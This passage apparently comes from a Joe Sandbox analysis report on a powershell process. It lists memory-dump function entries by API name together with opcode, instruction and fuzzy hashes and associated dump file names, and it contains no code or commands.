                                                    • Associated: 00000000.00000002.4122144871.0000022EFA103000.00000040.00001000.00020000.00000000.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_22efa0b0000_powershell.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: Locale$UpdateUpdate::___updatetlocinfo__updatetmbcinfo_errno_getptd_getptd_noexit_invalid_parameter_noinfostrchr
                                                    • String ID:
                                                    • API String ID: 4151157258-0
                                                    • Opcode ID: 981429a1da204f704ed88d261ee2d43387d2cfac4902a0026a6358d448239ec3
                                                    • Instruction ID: 8533cffe12fbf95590c34e5b25f1008a51740afa720ada8913a700472f7f0759
                                                    • Opcode Fuzzy Hash: 981429a1da204f704ed88d261ee2d43387d2cfac4902a0026a6358d448239ec3
                                                    • Instruction Fuzzy Hash: 0221D5636042A061EF605F91B25833D66D0E74CBD8F1EC129AA964FFF5CE6CC541A720
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.4122144871.0000022EFA0B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000022EFA0B0000, based on PE: true
                                                    • Associated: 00000000.00000002.4122144871.0000022EFA0F8000.00000040.00001000.00020000.00000000.sdmp
                                                    • Associated: 00000000.00000002.4122144871.0000022EFA0FB000.00000040.00001000.00020000.00000000.sdmp
                                                    • Associated: 00000000.00000002.4122144871.0000022EFA0FE000.00000040.00001000.00020000.00000000.sdmp
                                                    • Associated: 00000000.00000002.4122144871.0000022EFA101000.00000040.00001000.00020000.00000000.sdmp
                                                    • Associated: 00000000.00000002.4122144871.0000022EFA103000.00000040.00001000.00020000.00000000.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_22efa0b0000_powershell.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: clock
                                                    • String ID:
                                                    • API String ID: 3195780754-0
                                                    • Opcode ID: 88d80a52c757cc5c40c2c6d70a970e4954adb33c3b78b443ec03df4506b3ea8d
                                                    • Instruction ID: 3b3f3c4d8ea017e1780e07cc20d37dc7781a34f354c83ac325aeae6d01262311
                                                    • Opcode Fuzzy Hash: 88d80a52c757cc5c40c2c6d70a970e4954adb33c3b78b443ec03df4506b3ea8d
                                                    • Instruction Fuzzy Hash: 1C11232210074465EBB09EE27B5462BB690BB8C3D8F1B1431EE549BF75E978C8829700
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.4122144871.0000022EFA0B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000022EFA0B0000, based on PE: true
                                                    • Associated: 00000000.00000002.4122144871.0000022EFA0F8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000000.00000002.4122144871.0000022EFA0FB000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000000.00000002.4122144871.0000022EFA0FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000000.00000002.4122144871.0000022EFA101000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000000.00000002.4122144871.0000022EFA103000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_22efa0b0000_powershell.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: free$closesocketsend$accept
                                                    • String ID:
                                                    • API String ID: 47150829-0
                                                    • Opcode ID: caadc6cbf8b8aa9901aecb44ddbc265dbb6e74dc9ec5a2b89a727a9022558361
                                                    • Instruction ID: 60084b4c31e5ad72dcf6c29c91dec248483ef9138c906e8b35dd12aaf82c427a
                                                    • Opcode Fuzzy Hash: caadc6cbf8b8aa9901aecb44ddbc265dbb6e74dc9ec5a2b89a727a9022558361
                                                    • Instruction Fuzzy Hash: 3B01B525700A4191EF549BB2FBA97292361E74DFF4F169211DE160BFA5CE3CC481AB40
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.4122144871.0000022EFA0B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000022EFA0B0000, based on PE: true
                                                    • Associated: 00000000.00000002.4122144871.0000022EFA0F8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000000.00000002.4122144871.0000022EFA0FB000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000000.00000002.4122144871.0000022EFA0FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000000.00000002.4122144871.0000022EFA101000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000000.00000002.4122144871.0000022EFA103000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_22efa0b0000_powershell.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: CountTick$NamedPeekPipeSleep
                                                    • String ID:
                                                    • API String ID: 1593283408-0
                                                    • Opcode ID: 210e21c30d6d06447862c16b29a5b20d0c0fb279467bc43041b9c33569e9406a
                                                    • Instruction ID: 6c1b3d0a38791a7e4398d6d3df7a2473ca1a45ea165954236b94c028ad678beb
                                                    • Opcode Fuzzy Hash: 210e21c30d6d06447862c16b29a5b20d0c0fb279467bc43041b9c33569e9406a
                                                    • Instruction Fuzzy Hash: 3E01F931254A51E2FF2087A5F94830AA3A5F78C785F664024DB484AFB4DF3CC481A705
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.4122144871.0000022EFA0B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000022EFA0B0000, based on PE: true
                                                    • Associated: 00000000.00000002.4122144871.0000022EFA0F8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000000.00000002.4122144871.0000022EFA0FB000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000000.00000002.4122144871.0000022EFA0FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000000.00000002.4122144871.0000022EFA101000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000000.00000002.4122144871.0000022EFA103000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_22efa0b0000_powershell.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: CountTick$NamedPeekPipeSleep
                                                    • String ID:
                                                    • API String ID: 1593283408-0
                                                    • Opcode ID: aac62254f3a365505a6a564a1f05aa253f383d98e2b7473c1e2f14b721fad9df
                                                    • Instruction ID: 2a332c145e38857ca8ab3558dafbff62a9569a15230861fb2fdd3e3f7b157a26
                                                    • Opcode Fuzzy Hash: aac62254f3a365505a6a564a1f05aa253f383d98e2b7473c1e2f14b721fad9df
                                                    • Instruction Fuzzy Hash: BA01F432614A51A3FF208B94F98C31AB7A0F78DB84F264124DB850AF74DF3DC885AB04
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.4122144871.0000022EFA0B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000022EFA0B0000, based on PE: true
                                                    • Associated: 00000000.00000002.4122144871.0000022EFA0F8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000000.00000002.4122144871.0000022EFA0FB000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000000.00000002.4122144871.0000022EFA0FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000000.00000002.4122144871.0000022EFA101000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000000.00000002.4122144871.0000022EFA103000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_22efa0b0000_powershell.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: free$ErrorFreeHeapLast_errnoclosesocket
                                                    • String ID:
                                                    • API String ID: 1525665891-0
                                                    • Opcode ID: 514671407b84a75ab4a957943dd5047acaa779434bbb8d29509bbfd64e64c7a5
                                                    • Instruction ID: 4fa8c5f3177b9651157d5b152fb603a92cfb11bd240b64e121b028540bf6a9f5
                                                    • Opcode Fuzzy Hash: 514671407b84a75ab4a957943dd5047acaa779434bbb8d29509bbfd64e64c7a5
                                                    • Instruction Fuzzy Hash: D5E0172661064491EF14EBF2EAAA16C1720E78CF84F1600219E0E4FFB2DD6CC891E315
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.4120573142.0000022EF9B10000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000022EF9B10000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_22ef9b10000_powershell.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: _errno_getptd_noexit_invalid_parameter_noinfo
                                                    • String ID: B
                                                    • API String ID: 1812809483-1255198513
                                                    • Opcode ID: 60c63a2ab9f2c694e46ab874add7d0a6eb48e0963f6941f66a4f1d1620c6c169
                                                    • Instruction ID: 89d9bdfb164cf206a4fc4dbbb4063fe3725b266b5942c6cc5c2d5c8ccad90489
                                                    • Opcode Fuzzy Hash: 60c63a2ab9f2c694e46ab874add7d0a6eb48e0963f6941f66a4f1d1620c6c169
                                                    • Instruction Fuzzy Hash: 381121B2310A4082EB21DB82D55839DB364F7A8FE0F594324EF9807B95CF38C140CB04
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.4122144871.0000022EFA0B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000022EFA0B0000, based on PE: true
                                                    • Associated: 00000000.00000002.4122144871.0000022EFA0F8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000000.00000002.4122144871.0000022EFA0FB000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000000.00000002.4122144871.0000022EFA0FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000000.00000002.4122144871.0000022EFA101000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000000.00000002.4122144871.0000022EFA103000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_22efa0b0000_powershell.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: _errno_getptd_noexit_invalid_parameter_noinfo
                                                    • String ID: B
                                                    • API String ID: 1812809483-1255198513
                                                    • Opcode ID: c02d2d703cad3fde31994e70e132d1470a84cf0b2fdde3fa0011d2dc5e3ae6ea
                                                    • Instruction ID: 193183a288c2d08820c55988fd9ae50ad964f3534d2b4183a044184fd1f0c95a
                                                    • Opcode Fuzzy Hash: c02d2d703cad3fde31994e70e132d1470a84cf0b2fdde3fa0011d2dc5e3ae6ea
                                                    • Instruction Fuzzy Hash: 09118E72610B4096EB109F92E548399B660FB9CFE4FA54321AB580BFA9CF3CC245CB10
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.4120573142.0000022EF9B10000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000022EF9B10000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_22ef9b10000_powershell.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: free$_errno$_calloc_implcalloc
                                                    • String ID:
                                                    • API String ID: 4000150058-0
                                                    • Opcode ID: 1990de878bdb2b18b214190b8058df6cf8cdb58ae8a7ad838a221dc59059176c
                                                    • Instruction ID: ee8c7e72a26c50cbf42111559f05c7132089375dda31e8beb0561d72ac1d93d4
                                                    • Opcode Fuzzy Hash: 1990de878bdb2b18b214190b8058df6cf8cdb58ae8a7ad838a221dc59059176c
                                                    • Instruction Fuzzy Hash: AFC11B32604B849AEB74CF95E99439E77A4F398B84F11412AEBCD83F58DB38C455DB04
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.4122144871.0000022EFA0B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000022EFA0B0000, based on PE: true
                                                    • Associated: 00000000.00000002.4122144871.0000022EFA0F8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000000.00000002.4122144871.0000022EFA0FB000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000000.00000002.4122144871.0000022EFA0FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000000.00000002.4122144871.0000022EFA101000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000000.00000002.4122144871.0000022EFA103000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_22efa0b0000_powershell.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: free$_errno$_calloc_implcalloc
                                                    • String ID:
                                                    • API String ID: 4000150058-0
                                                    • Opcode ID: 098b9973f943fd418b7180529354ef0ede5274538db457ffc537a6b083c63ad8
                                                    • Instruction ID: 7825ba1b124b43eae1cad69ebc6b7316006818b36ceb642d9e1aedd9a16bcc95
                                                    • Opcode Fuzzy Hash: 098b9973f943fd418b7180529354ef0ede5274538db457ffc537a6b083c63ad8
                                                    • Instruction Fuzzy Hash: D9C10A32604B849AEB60CFA5F59439E77A4F78C788F11412AEB8D87F68DB38C555DB00
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.4120573142.0000022EF9B10000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000022EF9B10000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_22ef9b10000_powershell.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: free$_errno$_callnewhmalloc
                                                    • String ID:
                                                    • API String ID: 2761444284-0
                                                    • Opcode ID: 4bbd7cf35d3a9611d3bfe0cac302482741ce3a5729489c26a54f39a05b56b302
                                                    • Instruction ID: 0403b11d21a059522ad573653460cfe9ef32f19ccc8328f67706363cfb976396
                                                    • Opcode Fuzzy Hash: 4bbd7cf35d3a9611d3bfe0cac302482741ce3a5729489c26a54f39a05b56b302
                                                    • Instruction Fuzzy Hash: 7A510521300245B1FF7AABA297783AD6391F7A0BD0F5645259ACA1BFC6DF79C401E708
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.4122144871.0000022EFA0B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000022EFA0B0000, based on PE: true
                                                    • Associated: 00000000.00000002.4122144871.0000022EFA0F8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000000.00000002.4122144871.0000022EFA0FB000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000000.00000002.4122144871.0000022EFA0FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000000.00000002.4122144871.0000022EFA101000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000000.00000002.4122144871.0000022EFA103000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_22efa0b0000_powershell.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: free$_errno$AllocHeap_callnewhmalloc
                                                    • String ID:
                                                    • API String ID: 3531731211-0
                                                    • Opcode ID: 12a82f6075b3f1b1b37aa8f48911ccb92805a6f06572296fb4e409a8028c0c4a
                                                    • Instruction ID: d6da2e677b5833ab2f6919ff022785947f51de375c1a03388c73eab611092373
                                                    • Opcode Fuzzy Hash: 12a82f6075b3f1b1b37aa8f48911ccb92805a6f06572296fb4e409a8028c0c4a
                                                    • Instruction Fuzzy Hash: 2B51C37121034561EE18AFE1B6583AD6352FB88B90F160435AE0A5FFB6EF7CC452A700
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.4120573142.0000022EF9B10000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000022EF9B10000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_22ef9b10000_powershell.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: malloc
                                                    • String ID:
                                                    • API String ID: 2803490479-0
                                                    • Opcode ID: 80bcae34b50f6f3c58066c2fc9d1801100724e039a84313f03cb0366590bdd42
                                                    • Instruction ID: ef99cc89f34223f0fc2bc2b7baf2e4f5dbfa503bcf6769c25ea9db8cc0cc61ae
                                                    • Opcode Fuzzy Hash: 80bcae34b50f6f3c58066c2fc9d1801100724e039a84313f03cb0366590bdd42
                                                    • Instruction Fuzzy Hash: 3041F162700780A7EF69DFA6A62876D73A0F360B84F024425DE9A47F85FF34D885D708
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.4122144871.0000022EFA0B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000022EFA0B0000, based on PE: true
                                                    • Associated: 00000000.00000002.4122144871.0000022EFA0F8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000000.00000002.4122144871.0000022EFA0FB000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000000.00000002.4122144871.0000022EFA0FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000000.00000002.4122144871.0000022EFA101000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000000.00000002.4122144871.0000022EFA103000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_22efa0b0000_powershell.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: malloc
                                                    • String ID:
                                                    • API String ID: 2803490479-0
                                                    • Opcode ID: 1a29f9ba763a41af98fc3daf4a760b7fafa00e022ffdaa07ef0aba0b6fdaf4ad
                                                    • Instruction ID: 03e50fc3d36ceff1f0bf6f5ba1b27bb93c985bb73962e570b6684c5f7c9c34d6
                                                    • Opcode Fuzzy Hash: 1a29f9ba763a41af98fc3daf4a760b7fafa00e022ffdaa07ef0aba0b6fdaf4ad
                                                    • Instruction Fuzzy Hash: 5A419222200780A7EF54DBA6B62869D63A0B788BC4F464424DE5B8BF95DF39D915D700
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.4122144871.0000022EFA0B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000022EFA0B0000, based on PE: true
                                                    • Associated: 00000000.00000002.4122144871.0000022EFA0F8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000000.00000002.4122144871.0000022EFA0FB000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000000.00000002.4122144871.0000022EFA0FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000000.00000002.4122144871.0000022EFA101000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000000.00000002.4122144871.0000022EFA103000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_22efa0b0000_powershell.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: ErrorLast$CurrentProcessfreemalloc
                                                    • String ID:
                                                    • API String ID: 1397824077-0
                                                    • Opcode ID: cf62d47a1d5fdb9c876962cfa4c676d021a3fa8d1c8180fd698ba2a0010a64ef
                                                    • Instruction ID: e7b0229662e024e460fd1346b8923d1d6833349157ba6d23355c7858fc4f7d72
                                                    • Opcode Fuzzy Hash: cf62d47a1d5fdb9c876962cfa4c676d021a3fa8d1c8180fd698ba2a0010a64ef
                                                    • Instruction Fuzzy Hash: BB419672714641A6EF60DBA2F6447AE6391EB8C7C8F025415AF894BFE6EF7CC1419700